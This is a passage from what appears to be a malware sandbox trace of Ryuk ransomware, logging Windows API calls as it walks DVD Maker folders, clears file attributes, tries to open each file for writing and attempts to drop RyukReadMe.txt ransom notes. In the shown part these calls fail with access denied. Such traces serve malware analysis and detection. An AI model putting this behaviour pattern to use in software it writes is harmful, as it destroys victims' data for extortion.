(hObject=0xffffffffffffffff) returned 0 [0133.660] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.660] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.660] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.661] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.661] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.661] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.661] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.661] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.661] SetLastError (dwErrCode=0x0) [0133.662] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.662] GetLastError () returned 0x5 [0133.662] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.662] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.663] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.664] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.664] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.664] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.664] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.664] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0133.664] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.665] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.665] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png", dwFileAttributes=0x80) returned 0 [0133.666] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.666] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.666] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.666] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.666] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png", dwFileAttributes=0x80) returned 0 [0133.666] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.666] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.666] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.666] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.667] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.667] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.667] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.667] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.667] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.667] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.668] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.668] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.668] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.668] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.668] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.668] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.669] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.669] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.669] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.669] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.669] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.669] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.669] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.669] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.670] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.670] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.670] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.670] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.670] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.670] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv", dwFileAttributes=0x80) returned 0 [0133.670] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.670] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.670] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.670] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.671] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.671] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.671] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.671] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.671] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.671] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.672] SetLastError (dwErrCode=0x0) [0133.672] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.677] GetLastError () returned 0x5 [0133.677] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.677] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.677] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.677] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.677] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\scene_button_style_default_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.677] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.677] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.677] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.678] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", dwFileAttributes=0x80) returned 0 [0133.678] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.678] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.678] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.678] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", dwFileAttributes=0x80) returned 0 [0133.678] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.678] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.678] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.679] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", dwFileAttributes=0x80) returned 0 [0133.679] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.679] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.679] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.679] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.679] SetLastError (dwErrCode=0x0) [0133.679] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.679] GetLastError () returned 0x5 [0133.679] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.679] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.679] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.681] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.681] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.681] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.681] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.681] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.681] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.681] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.681] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.681] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.681] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0133.681] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.682] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.682] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.682] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.682] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.682] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.682] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.683] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.683] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.683] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.683] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.683] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.683] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.683] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.683] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.683] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.683] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.684] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.684] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.684] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.684] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.684] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.684] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD 